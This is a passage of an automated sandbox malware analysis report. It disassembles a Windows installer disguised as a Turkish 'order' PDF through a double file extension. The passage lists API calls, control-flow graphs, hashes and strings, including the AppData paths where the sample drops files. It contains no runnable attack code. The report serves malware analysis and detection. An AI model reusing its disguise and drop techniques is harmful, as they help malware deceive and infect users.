                                                                  • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                                  • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                  • String ID: 6B
                                                                  • API String ID: 3282139019-4127139157
                                                                  • Opcode ID: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                                                  • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                                                  • Opcode Fuzzy Hash: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                                                  • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D
                                                                  Function 00403974 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 295 403974-40398c call 40665e 298 4039a0-4039d7 call 406152 295->298 299 40398e-40399e call 4061cb 295->299 304 4039d9-4039ea call 406152 298->304 305 4039ef-4039f5 lstrcatW 298->305 308 4039fa-403a23 call 403c4a call 405c61 299->308 304->305 305->308 313 403ab5-403abd call 405c61 308->313 314 403a29-403a2e 308->314 320 403acb-403af0 LoadImageW 313->320 321 403abf-403ac6 call 4062a6 313->321 314->313 316 403a34-403a5c call 406152 314->316 316->313 322 403a5e-403a62 316->322 324 403b71-403b79 call 40140b 320->324 325 403af2-403b22 RegisterClassW 320->325 321->320 326 403a74-403a80 lstrlenW 322->326 327 403a64-403a71 call 405b86 322->327 338 403b83-403b8e call 403c4a 324->338 339 403b7b-403b7e 324->339 328 403c40 325->328 329 403b28-403b6c SystemParametersInfoW CreateWindowExW 325->329 333 403a82-403a90 lstrcmpiW 326->333 334 403aa8-403ab0 call 405b59 call 406284 326->334 327->326 332 403c42-403c49 328->332 329->324 333->334 337 403a92-403a9c GetFileAttributesW 333->337 334->313 341 403aa2-403aa3 call 405ba5 337->341 342 403a9e-403aa0 337->342 348 403b94-403bae ShowWindow call 4065ee 338->348 349 403c17-403c18 call 4053bf 338->349 339->332 341->334 342->334 342->341 354 403bb0-403bb5 call 4065ee 348->354 355 403bba-403bcc GetClassInfoW 348->355 353 403c1d-403c1f 349->353 356 403c21-403c27 353->356 357 403c39-403c3b call 40140b 353->357 354->355 360 403be4-403c07 DialogBoxParamW call 40140b 355->360 361 403bce-403bde GetClassInfoW RegisterClassW 355->361 356->339 362 403c2d-403c34 call 40140b 356->362 357->328 366 403c0c-403c15 call 4038c4 360->366 361->360 362->339 366->332
                                                                  APIs
                                                                    • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                    • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                  • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00000000), ref: 004039F5
                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403A93
                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness), ref: 00403ADC
                                                                    • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                  • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                                  • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                                  • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                  • API String ID: 1975747703-3339788236
                                                                  • Opcode ID: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                                                  • Instruction ID: ac693f2390e271b0591ead3bca04d252cd9040af8bb9d400f005d771bc7483c2
                                                                  • Opcode Fuzzy Hash: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                                                  • Instruction Fuzzy Hash: 0D61B770244600BFE630AF269D46F273A6CEB44B45F40057EF985B62E2DB7D5911CA2D
                                                                  Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405d7a 372 402f37-402f65 call 406284 call 405ba5 call 406284 GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 375 40310f-403113 373->375 388 403062-403065 381->388 389 4030b5-4030ba 381->389 384 402f70-402f87 382->384 386 402f89 384->386 387 402f8b-402f94 call 4032fb 384->387 386->387 395 402f9a-402fa1 387->395 396 4030bc-4030c4 call 402e79 387->396 391 403067-40307f call 403311 call 4032fb 388->391 392 403089-4030b3 GlobalAlloc call 403311 call 403116 388->392 389->375 391->389 418 403081-403087 391->418 392->389 416 4030c6-4030d7 392->416 400 402fa3-402fb7 call 405d35 395->400 401 40301d-403021 395->401 396->389 407 40302b-403031 400->407 415 402fb9-402fc0 400->415 406 403023-40302a call 402e79 401->406 401->407 406->407 412 403040-40304a 407->412 413 403033-40303d call 406751 407->413 412->384 417 403050 412->417 413->412 415->407 422 402fc2-402fc9 415->422 423 4030d9 416->423 424 4030df-4030e4 416->424 417->381 418->389 418->392 422->407 425 402fcb-402fd2 422->425 423->424 426 4030e5-4030eb 424->426 425->407 427 402fd4-402fdb 425->427 426->426 428 4030ed-403108 SetFilePointer call 405d35 426->428 427->407 429 402fdd-402ffd 427->429 432 40310d 428->432 429->389 431 403003-403007 429->431 433 403009-40300d 431->433 434 40300f-403017 431->434 432->375 433->417 433->434 434->407 435 403019-40301b 434->435 435->407
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402EEE
                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                  • String ID: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                  • API String ID: 4283519449-4217358736
                                                                  • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                  • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                                  • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                  • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD
                                                                  Function 004062A6 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 436 4062a6-4062b1 437 4062b3-4062c2 436->437 438 4062c4-4062da 436->438 437->438 439 4062e0-4062ed 438->439 440 4064f2-4064f8 438->440 439->440 441 4062f3-4062fa 439->441 442 4064fe-406509 440->442 443 4062ff-40630c 440->443 441->440 445 406514-406515 442->445 446 40650b-40650f call 406284 442->446 443->442 444 406312-40631e 443->444 447 406324-406362 444->447 448 4064df 444->448 446->445 450 406482-406486 447->450 451 406368-406373 447->451 452 4064e1-4064eb 448->452 453 4064ed-4064f0 448->453 456 406488-40648e 450->456 457 4064b9-4064bd 450->457 454 406375-40637a 451->454 455 40638c 451->455 452->440 453->440 454->455 460 40637c-40637f 454->460 463 406393-40639a 455->463 461 406490-40649c call 4061cb 456->461 462 40649e-4064aa call 406284 456->462 458 4064cc-4064dd lstrlenW 457->458 459 4064bf-4064c7 call 4062a6 457->459 458->440 459->458 460->455 466 406381-406384 460->466 472 4064af-4064b5 461->472 462->472 468 40639c-40639e 463->468 469 40639f-4063a1 463->469 466->455 473 406386-40638a 466->473 468->469 470 4063a3-4063ca call 406152 469->470 471 4063dc-4063df 469->471 484 4063d0-4063d7 call 4062a6 470->484 485 40646a-40646d 470->485 477 4063e1-4063ed GetSystemDirectoryW 471->477 478 4063ef-4063f2 471->478 472->458 476 4064b7 472->476 473->463 480 40647a-406480 call 406518 476->480 481 406461-406465 477->481 482 4063f4-406402 GetWindowsDirectoryW 478->482 483 40645d-40645f 478->483 480->458 481->480 487 406467 481->487 482->483 483->481 486 406404-40640e 483->486 484->481 485->480 490 40646f-406475 lstrcatW 485->490 492 406410-406413 486->492 493 406428-40643e SHGetSpecialFolderLocation 486->493 487->485 490->480 492->493 497 406415-40641c 492->497 494 406440-406457 SHGetPathFromIDListW CoTaskMemFree 493->494 495 406459 493->495 494->481 494->495 495->483 498 406424-406426 497->498 498->481 498->493
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E7
                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000), ref: 004063FA
                                                                  • SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000), ref: 00406436
                                                                  • SHGetPathFromIDListW.SHELL32(00410EA0,Call), ref: 00406444
                                                                  • CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000), ref: 004064CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 717251189-1599669604
                                                                  • Opcode ID: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                                                  • Instruction ID: 605843c2509a57f6f3c23207e2b9262681d5cb504286618bc70e882f3b2b38d7
                                                                  • Opcode Fuzzy Hash: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                                                  • Instruction Fuzzy Hash: 2C611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D
                                                                  Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 563 40176f-401794 call 402c41 call 405bd0 568 401796-40179c call 406284 563->568 569 40179e-4017b0 call 406284 call 405b59 lstrcatW 563->569 574 4017b5-4017b6 call 406518 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 4065c7 578->579 580 4017f2-4017f5 578->580 587 4017dd-4017ef 579->587 588 4017cd-4017db CompareFileTime 579->588 581 4017f7-4017f8 call 405d55 580->581 582 4017fd-401819 call 405d7a 580->582 581->582 590 40181b-40181e 582->590 591 40188d-4018b6 call 4052ec call 403116 582->591 587->580 588->587 592 401820-40185e call 406284 * 2 call 4062a6 call 406284 call 4058ea 590->592 593 40186f-401879 call 4052ec 590->593 603 4018b8-4018bc 591->603 604 4018be-4018ca SetFileTime 591->604 592->578 626 401864-401865 592->626 605 401882-401888 593->605 603->604 607 4018d0-4018db CloseHandle 603->607 604->607 608 402ace 605->608 610 4018e1-4018e4 607->610 611 402ac5-402ac8 607->611 612 402ad0-402ad4 608->612 615 4018e6-4018f7 call 4062a6 lstrcatW 610->615 616 4018f9-4018fc call 4062a6 610->616 611->608 622 401901-4022fc call 4058ea 615->622 616->622 622->612 626->605 628 401867-401868 626->628 628->593
                                                                  APIs
                                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow,?,?,00000031), ref: 004017B0
                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow,?,?,00000031), ref: 004017D5
                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                    • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                    • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll), ref: 00405359
                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp$C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow$Call
                                                                  • API String ID: 1941528284-4171931090
                                                                  • Opcode ID: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                                                  • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                                                  • Opcode Fuzzy Hash: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                                                  • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E
                                                                  Function 004052EC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 629 4052ec-405301 630 405307-405318 629->630 631 4053b8-4053bc 629->631 632 405323-40532f lstrlenW 630->632 633 40531a-40531e call 4062a6 630->633 635 405331-405341 lstrlenW 632->635 636 40534c-405350 632->636 633->632 635->631 637 405343-405347 lstrcatW 635->637 638 405352-405359 SetWindowTextW 636->638 639 40535f-405363 636->639 637->636 638->639 640 405365-4053a7 SendMessageW * 3 639->640 641 4053a9-4053ab 639->641 640->641 641->631 642 4053ad-4053b0 641->642 642->631
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                  • lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll), ref: 00405359
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll
                                                                  • API String ID: 2531174081-2055974490
                                                                  • Opcode ID: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                                                  • Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
                                                                  • Opcode Fuzzy Hash: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                                                  • Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8
                                                                  Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
